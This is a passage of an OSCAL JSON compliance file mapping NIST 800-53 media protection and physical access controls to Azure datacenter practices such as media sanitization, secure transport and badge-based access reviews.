inventory checks to verify the status of all tools. Access to lock box or maintenance storage room is tracked in the access badge reader logs, which are available in the event of an investigation. On a quarterly basis, the datacenter management team and physical security teams perform audits of the DCAT access list to keep the access list of maintenance personnel current. Personnel terminations or transfers are reflected immediately through a manual update of the access list._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"82c9b3be-d318-44a1-a245-25767742bc48","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-4","statements":[{"uuid":"4cc7acd0-a363-4ed8-ad66-de5a993720af","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-4_smt.a","by-components":[{"uuid":"7b2b428a-b8fc-45ef-8c7f-0a316e998660","export":{"provided":[{"uuid":"5622098a-de2c-481e-a9e2-a2c9eb4804ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-009"}],"description":"Azure digital media assets are physically and securely stored within Azure datacenters, colocation rooms, or Global Cloud Coordination Centers (GC3s). Azure locations have multiple layers of physical access controls and video surveillance in place to provide secure storage. Digital media includes servers, network devices, and magnetic tapes. Non-digital media is not used by Azure in the datacenter environment. Facilities define controlled areas as appropriate for their footprint and layout. Any areas containing digital media assets are considered controlled regardless of facility layout and are protected by the physical and environmental controls._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"a3d16e42-51e2-4c1e-9da9-a88300ed3eac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-4_smt.b","by-components":[{"uuid":"e07e6e65-1367-421d-9847-161e246f4920","export":{"provided":[{"uuid":"3c2ba19b-fe1f-4a3d-a120-f776102f565b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-010"}],"description":"Azure digital media assets are protected in Azure datacenters and GC3s through physical access controls and logical access controls for the lifetime of the asset. Azure assets are cleared, purged, or destroyed with methods NIST SP 800-88 Revision 1 prior to the asset's reuse or disposal. Azure utilizes data erasure units from Blancco. Blancco supports NIST SP 800-88 requirements for cleansing and purging/secure erasure. For asset destruction, Azure utilizes onsite asset destruction services._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"e5e41597-41f5-42cb-8297-f35d14d08816","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-5","statements":[{"uuid":"67e4d8a3-539b-49dc-95f7-fab620d935f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-011"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.a","by-components":[{"uuid":"051611e4-96b1-49e8-9525-a48579ee634c","export":{"provided":[{"uuid":"96ec695a-3de7-4391-8c37-c44a7c9f0492","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-011"}],"description":"Digital media at Azure datacenters consist of servers, network devices, and magnetic tapes. Azure datacenters do not use non-digital media. Azure utilizes secure transport and data deletion to protect media that is being transported outside the datacenter._x000D_ _x000D_ All media being transported from Azure datacenters require accurate tracking. Tickets are created to arrange and track the transportation of media. Azure has contracted with several approved vendors to provide secure shipping services. Secure Transport begins with an accurate inventory and chain of custody. Authorized asset managers are required to manage the exchange of assets. Assets are inventoried at the time of delivery to the transporter. Requirements for transporting an asset are defined according to their asset classification and data classification. If data is required to be intact, an approved policy exception request is required. The asset manager must witness the container being locked and a tamper proof seal applied. Secure Transport could have additional requirements such as a dedicated transport for only Microsoft assets, GPS tracking, and only stopping at Microsoft locations. In cases of longer transport routes, the requirement could be that there are multiple drivers and trucks with sleeping quarters to provide for non-stop delivery. At the delivery location, the transport company's approved personnel must be present to witness the removal of the tamper proof seal and unlocking of the container. The receiving personnel inventories the shipment and send a message confirming the receipt of the assets. This inventory is validated by the Microsoft asset manager._x000D_ _x000D_ Azure contracts with a vendor to provide equipment destruction. All assets are required to be destroyed onsite. Azure assets are cleansed/purged with methods consistent with NIST SP 800-88 prior to reuse. Prior to cleansing or destruction, an inventory is created by Datacenter Logistics. If a vendor is used for destruction, the vendor provides a certificate of destruction for each asset destroyed, which is validated by the asset manager._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7e3c893d-61ab-4388-bdff-043977d6539f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-012"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.b","by-components":[{"uuid":"068c4871-d28a-4345-b908-918b53dec8c7","export":{"provided":[{"uuid":"92d21fb4-bd99-44ff-99a7-7128727f5e54","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-012"}],"description":"Azure maintains accountability for assets leaving the datacenter consistent with NIST SP 800-88: consistent cleansing/purging, asset destruction, encryption, accurate inventorying, tracking, and protection of chain of custody during transport._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"3af14d35-bc30-471b-9d47-de6a0530aa75","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-013"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.c","by-components":[{"uuid":"60b94408-24d8-4a04-9be8-ac5d907d2a85","export":{"provided":[{"uuid":"df278ac9-cd0c-4106-a3b7-b38398fb43c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-013"}],"description":"Azure restricts the activities of asset transport to authorized personnel through the protection of the chain of custody. The use of locks, tamper proof seals, and requiring validation of the asset inventories ensures that only authorized personnel are involved in the asset transport._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"7d8d3565-211b-4441-b9ab-36e264c4e7db","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-014"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-5_smt.d","by-components":[{"uuid":"609f5800-99ab-41fa-b41d-fa6cf4c12122","export":{"provided":[{"uuid":"fdf03952-cadb-4c02-9608-489b03d675f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-014"}],"description":"The transport of Azure digital media outside of the Azure security-controlled space requires the supervision of two Datacenter Operations (DCOPs) team members. The assets are accompanied and supervised at all times by authorized personnel until they are destroyed. The DPS team utilizes Iron Mountain and Azure Cool Storage for storage of media for media that contains valid, unexpired data._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"0a8261ae-f841-48cc-b2a4-c4b0ad256ac1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6","statements":[{"uuid":"3626be1d-3cab-4ab3-b2a0-51ee4a29e655","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-015"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6_smt.a","by-components":[{"uuid":"bb7c899a-9f2c-43c7-92f0-b56c76a8b618","export":{"provided":[{"uuid":"d5d01652-1ade-4056-8833-653619e9e0c4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-015"}],"description":"In Azure datacenters , Azure digital media is sanitized using approved tools and in compliance with customer requirements, including NIST Special Publication 800-88 Revision 1 prior to being reused. Non-digital media is not used by Azure in the datacenter environment. All data bearing devices (DBDs) used by Azure are shredded by an approved ITAD Vendor or customer per customer standards on site. No DBDs leave the Azure datacenters . If hardware is considered volatile and deemed returnable to the supplier, it is shipped out via the standard RMA process as outlined in the Sparing and RMA Strategy."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"4e31f887-e551-4046-8047-44524cfb397b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-016"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6_smt.b","by-components":[{"uuid":"96f4bc61-be7f-4d0e-b509-9e3de88ecdba","export":{"provided":[{"uuid":"0aa4428e-6929-4021-8604-cfd7b1a54c15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-016"}],"description":"Azure uses data erasure units and processes to sanitize data in compliance with customer requirements , including NIST Special Publication 800-88 Revision 1 which are commensurate with the Azure asset classification of the asset. For assets requiring destruction, Azure utilizes onsite asset destruction services."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"7f156757-b000-4d37-b224-57510b8619a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6.1","statements":[{"uuid":"d5115626-57b7-4257-87d0-79db080861ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-017"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6.1_smt","by-components":[{"uuid":"7b534cf4-28cc-4029-b72d-bd261cd38614","export":{"provided":[{"uuid":"cb8260ec-4fe3-4ae3-bb6e-97b1b708950e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-017"}],"description":"Digital media at Azure datacenters hosting the Azure environment consist of servers, network devices, and physical hard disks. Azure datacenters do not use non-digital media._x000D_ _x000D_ Digital media within Azure is not allowed to be transported from the Azure location unless it is being destroyed. Assets that are to be destroyed are stored in locked storage bins. At the time of destruction and under CCTV supervision, Azure digital media is removed from the locked storage bin and scanned to log the serial number of the asset to be destroyed. The asset is shredded while being supervised by cleared personnel. The destruction vendor issues a certificate of destruction for the assets that were destroyed._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"170d6c90-6c80-4466-936f-767558dbdc5f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6.2","statements":[{"uuid":"55557046-431d-438d-af51-7a56889a93ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-018"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6.2_smt","by-components":[{"uuid":"9decc92d-36de-4c52-8be9-c33553bfedda","export":{"provided":[{"uuid":"832d2ad0-7105-4e28-ab30-322845d52e83","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-018"}],"description":"Azure uses data erasure units and processes to sanitize data in compliance with NIST SP 800-88 Revision 1 prior to being reused}. Every one hundred and eighty (180) days, the Cyber Defense Operations Center (CDOC) tests the Azure data erasure units and the process for erasure. In the test, Cloud Operations + Innovation Engineering (CO + IE) verifies that the intended sanitization is being achieved through a forensic analysis of tested hard drives to confirm that the data has been sanitized by the data erasure units._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"62bf6d14-2763-45e6-8273-12012e75b97a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-6.3","statements":[{"uuid":"39298355-a6bd-4e63-900e-9bfcf038b477","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-019"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-6.3_smt","by-components":[{"uuid":"02b66f07-7883-47e5-ad79-de507deebd8d","export":{"provided":[{"uuid":"45e0aef4-c25c-4d71-9ccc-29fae59f0db8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-019"}],"description":"To prevent the infection of Azure by malware on portable storage devices, Azure datacenters follow the Tools and Removable Media Security Procedure in the Datacenter Services Run Book. The procedure specifies that the following actions be taken with USB drives before use in the Azure environment:_x000D_ _x000D_ * Format the USB drives when the drives are first purchased from the manufacturer or vendor, before the initial use or when being reused for a different tool._x000D_ * Scan any USB drive to be used in an Azure-designated area for malware, before taking the drive into the area._x000D_ * After using a drive within an Azure-designated area, format the drive before leaving the area._x000D_ _x000D_ The Tools and Removable Media Security Procedure also requires that all lost, discarded, stolen or misplaced thumb drives never be re-introduced into Azure, but that they be instead cataloged and destroyed._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"5f74a971-9c9e-4f77-bbd0-c29fe1a353a0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-7","statements":[{"uuid":"93b3e647-ceaf-4e15-bb3c-1a8f2e8ddd1c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-7_smt.a","by-components":[{"uuid":"ebfa0ce8-cf4b-4289-bb5a-84cf24083c16","export":{"provided":[{"uuid":"c58e8414-076c-4de4-8895-afe73a91f8f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-020"}],"description":"Asset owners are required to assign their assets with an asset classification and no assets are exempt from this requirement. In the Azure datacenters and GC3s, assets refer to servers and network devices. Other digital media like USB flash/thumb drives or CDs/DVDs are managed by specific policies and procedures, including the Asset Management section of the Microsoft Security Program Policy (MSPP), governing how those devices are managed. Non-digital media is not used. The usage of digital media in Azure datacenters and GC3s is monitored twenty-four (24) hours a day, seven (7) days a week via CCTV coverage."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"b392f66c-403b-41d9-9a1f-41f1f02fd923","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-021"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"mp-7_smt.b","by-components":[{"uuid":"cf581630-fa0e-4fce-88c4-63ca63f96667","export":{"provided":[{"uuid":"92aef83d-4922-4dcb-be0a-576f2e1c948e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-021"}],"description":"Asset owners are required to assign their assets with an asset classification and no assets are exempt from this requirement. In the Azure datacenters and GC3s, assets refer to servers and network devices. All assets has identified owners and there are no assets left without identified owner. Other digital media like USB flash/thumb drives or CDs/DVDs are managed by specific policies and procedures, including the Asset Management section of the Microsoft Security Program Policy (MSPP), governing how those devices are managed. Non-digital media is not used. The usage of digital media in Azure datacenters and GC3s is monitored twenty-four (24) hours a day, seven (7) days a week via CCTV coverage."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"5c2b7959-3c89-452b-b76a-ae8f9b73798a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-2","statements":[{"uuid":"58d03015-1166-4101-a89f-1102bb1f407b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.a","by-components":[{"uuid":"d11f5a1e-ee5b-40b1-913e-c577c947c918","export":{"provided":[{"uuid":"84c7d728-eacb-4342-b144-b3f1ce34298c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-006"}],"description":"Access to an Azure datacenter must be approved by the Datacenter Management (DCM) team through the Datacenter Access Tool (DCAT). On a quarterly basis, the DCM team for each datacenter is required to perform an appropriateness review of the personnel with authorized access to their datacenter. The review consists of reviewing reports from security showing personnel with current access to the datacenter. The DCM determines the access changes to be made and communicates a request to security to have the changes performed. After the changes have been made, the DCM team reviews reports verifying that the changes have been completed. The quarterly access review is documented in a work ticket that includes the reports that were reviewed by the DCM team. These tickets are reviewed as part of quality control, quality assurance process. The DC Quarterly Access Review process is documented in the Datacenter Services (DCS) SOP. In between quarterly access reviews, DCAT procedures support the least privileges principle by requiring access assignments to require an end date. After the end date is reached, access is removed by DCAT. The DCAT termination process can be manual or automatic. Manual scenarios are where a Datacenter Manager or security team member initiates the termination of an individual's DCAT requests. An automatic termination occurs when an individual with a Microsoft alias/domain account has their employment terminated in Microsoft's headcount management tool (HeadTrax). Additionally, when access is no longer required, it is the standard procedure for security officers at the datacenter or the DCM team to manually request the termination of access. The DC Quarterly Access Review is a quarterly true-up of the access list and not the primary control relied upon to keep the access list current._x000D_ _x000D_ Azure Third-Party (Leased) Datacenters_x000D_ _x000D_ The DCM of a leased datacenter is responsible for conducting the same access review as a fully-managed Azure datacenter. Instead of reviewing the access levels for the entire datacenter, the DCM requests the access list for the Microsoft areas from the datacenter's security team. The DCM is responsible for ensuring that both the landlord's access system and DCAT reflect the same data. The quarterly access review is conducted in the same manner as a fully-managed Azure datacenter._x000D_ _x000D_ DCAT requests are used in leased datacenter locations in a slightly different manner from a fully-managed Azure datacenter. The exception is that the approved DCAT request is emailed by the DCM team to the security team at the leased datacenter. The leased datacenter security team inputs the approved request into the leased datacenter's access tool._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"c6492eab-dd56-4bc4-a93e-6fc93de161ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.b","by-components":[{"uuid":"2f53908a-3526-485d-8210-b3e0a0a96ff0","export":{"provided":[{"uuid":"308d5a1b-6218-45fb-b848-4a29787c29be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-007"}],"description":"DCAT is the authoritative source listing all personnel with authorized access to a specific datacenter. DCAT is linked with the datacenter's physical security access control devices and authorizes access based on access levels that are approved by the DCM team. Access levels are assigned in DCAT to either a user's Microsoft issued badge or a temporary access badge that is assigned at the datacenter by the Control Room Supervisor (CRS). Access levels are approved by the DCM team. Besides credentials assigned to physical badges, some areas of datacenter require two- factor authentication employing the user's biometric data (hand geometry or fingerprint) as well as badge authentication to gain authorized entry._x000D_ _x000D_ Azure Third-Party (Leased) Datacenters_x000D_ _x000D_ At a leased datacenter, DCAT is still considered the authoritative source for access to Microsoft areas within the datacenter. All access request approvals are first processed in DCAT and then emailed to the leased datacenter's security team. The leased datacenter's security team only authorizes access to Microsoft areas to individuals with an approved DCAT request. Besides credentials assigned to physical badges, some areas of datacenter require two- factor authentication employing the user's biometric data (hand geometry or fingerprint) as well as badge authentication to gain authorized entry._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"2be8a5e9-87bb-4b5b-9493-143f6a9f4545","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.c","by-components":[{"uuid":"134051f4-db9a-4bdd-bb7e-70c15bbf0064","export":{"provided":[{"uuid":"7993177a-e0db-4e23-a613-fe06d267f454","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-008"}],"description":"The physical security team and datacenter management team conducts a quarterly access review of the access control list to remove or update individual access as necessary. Terminations are handled immediately through the DCAT termination process. If termination of access to the datacenter is required, the DCM team provides the physical security team notification of termination request. Once processed, the DCM team verifies access has been terminated in DCAT._x000D_ _x000D_ Additionally, the DCAT system performs real time comparisons of access authorization and automatically removes access when access tickets expire. A person with an expired access ticket is escorted back to Security Operations Center to have their access renewed._x000D_ _x000D_ Azure Third-Party (Leased) Datacenters_x000D_ _x000D_ The DCM of a leased datacenter is responsible for conducting the same access review as a fully-managed Azure datacenter. Instead of reviewing the access levels for the entire datacenter, the DCM requests the access list for the Microsoft areas from the datacenter's security team. The DCM is responsible for ensuring that both the landlord's access system and DCAT reflect the same data. The quarterly access review is conducted in the same manner as a fully-managed Azure datacenter._x000D_ _x000D_ DCAT requests are used as leased datacenters in a slightly different manner from a fully-managed Azure datacenter. The exception is that the approved DCAT request is emailed by the DCM team to the security team at the leased datacenter. The leased datacenter security team inputs the approved request into the leased datacenter's access tool. Terminations are handled immediately through the DCAT termination process and communication to the leased datacenter's security team._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"e8a6bdbe-6cc5-447d-b4ff-18f2a4cbb900","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-2_smt.d","by-components":[{"uuid":"52dbf4f4-a51f-495c-95b7-734066c01b8c","export":{"provided":[{"uuid":"8353b083-e62f-4cf5-bbff-3acbde52813c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-009"}],"description":"The physical security team and DCM team conduct a quarterly review of the access control list to remove or update individual access as necessary. Terminations are handled immediately through a DCAT termination process detailed in Part c above._x000D_ _x000D_"}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"0eb72907-6c6d-4af6-96d6-7e240f108aea","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-3","statements":[{"uuid":"083b320b-b62d-49dd-9525-e70c34f01a91","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-010"},{"name":"control-origination","value":"system-specific"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-011"}],"statement-id":"pe-3_smt.a","by-components":[{"uuid":"129d551f-9812-4117-a7e1-30f557b733f4","export":{"provided":[{"uuid":"cf39b9bb-94fa-4b3e-b202-ec128c75cd68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-010"}],"description":"Azure enforces physical access authorizations for all physical access points to Azure datacenters. The exteriors of the datacenter buildings are non-descript and do not advertise that they are Microsoft datacenters. Depending on the design of a datacenter, physical access authorizations at Azure datacenters may begin at a controlled perimeter gate or secured facility door that requires either access smart card authorization or security officer authorization. Main access to Azure datacenter facilities is restricted to a single point of entry that is manned twenty-four (24) hours a day, seven (7) days a week by security personnel. Emergency exits are alarmed and under video surveillance. Electronic access control devices are installed on doors separating the reception area from the facilities' interior to restrict access to approved personnel only. Azure datacenters have a security operations desk located in the reception area and in line of sight of the single entry point. The datacenter lobbies have man-trap portal devices that require multifactor authentication such as access card and biometric hand geometry or fingerprint authentication to pass beyond the lobby. Areas within Microsoft datacenters that contain critical systems (e.g., colocations, critical environments, Main Distribution Frame (MDF) rooms, etc.) are further restricted through various security mechanisms such as electronic access control, biometric devices, and anti-passback controls. Additionally, doors are alarmed and under video surveillance. Access authorizations at Azure datacenters are managed through the Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team. Access to areas within the datacenter is granted based on the least privilege principle. Before a person arrives at a datacenter, they must have a DCAT request approved by the DCM team. The DCM team reviews the request for a valid business justification and for appropriate access levels. Upon arriving at the datacenter, the individual on the request must have their identification verified by the Control Room Supervisor against a Microsoft identification smart card or a valid government issued identification card or document. Azure datacenters (leased and fully-managed) utilize physical access devices such as metal detectors, perimeter gates, electronic access smart card readers, biometric readers, man-traps/portals, anti-tailgate devices (in leased datacenters), and anti-pass back controls, as well as security officers to control access to datacenters. As an additional security measure for leased datacenters, Azure has required that anti-tailgating alarms be deployed at the doors to Microsoft colocation rooms. Azure Third-Party (Leased) Datacenters The physical security requirements of a leased datacenter are designed to reflect similar security capabilities of a fully-managed Azure datacenter. As an additional security measure for leased datacenters, Azure has required that anti-tailgating alarms be deployed at the doors to Microsoft colocation rooms."},{"uuid":"b72617e0-2a7a-45f2-8084-923c5eb827d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-011"}],"description":"Azure enforces physical access authorizations for all physical access points to Azure datacenters. The exteriors of the datacenter buildings are non-descript and do not advertise that they are Microsoft datacenters. Depending on the design of a datacenter, physical access authorizations at Azure datacenters may begin at a controlled perimeter gate or secured facility door that requires either access smart card authorization or security officer authorization. Main access to Azure datacenter facilities is restricted to a single point of entry that is manned twenty-four (24) hours a day, seven (7) days a week by security personnel. Emergency exits are alarmed and under video surveillance. Electronic access control devices are installed on doors separating the reception area from the facilities' interior to restrict access to approved personnel only. Azure datacenters have a security operations desk located in the reception area and in line of sight of the single entry point. The datacenter lobbies have man-trap portal devices that require multifactor authentication such as access card and biometric hand geometry or fingerprint authentication to pass beyond the lobby. Areas within Microsoft datacenters that contain critical systems (e.g., colocations, critical environments, Main Distribution Frame (MDF) rooms, etc.) are further restricted through various security mechanisms such as electronic access control, biometric devices, and anti-passback controls. Additionally, doors are alarmed and under video surveillance. Access authorizations at Azure datacenters are managed through the Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team. Access to areas within the datacenter is granted based on the least privilege principle. Before a person arrives at a datacenter, they must have a DCAT request approved by the DCM team. The DCM team reviews the request for a valid business justification and for appropriate access levels. Upon arriving at the datacenter, the individual on the request must have their identification verified by the Control Room Supervisor against a Microsoft identification smart card or a valid government issued identification card or document. Azure datacenters (leased and fully-managed) utilize physical access devices such as metal detectors, perimeter gates, electronic access smart card readers, biometric readers, man-traps/portals, anti-tailgate devices (in leased datacenters), and anti-pass back controls, as well as security officers to control access to datacenters. As an additional security measure for leased datacenters, Azure has required that anti-tailgating alarms be deployed at the doors to Microsoft colocation rooms. Azure Third-Party (Leased) Datacenters The physical security requirements of a leased datacenter are designed to reflect similar security capabilities of a fully-managed Azure datacenter. As an additional security measure for leased datacenters, Azure has required that anti-tailgating alarms be deployed at the doors to Microsoft colocation rooms."}]},"description":"See inheritance 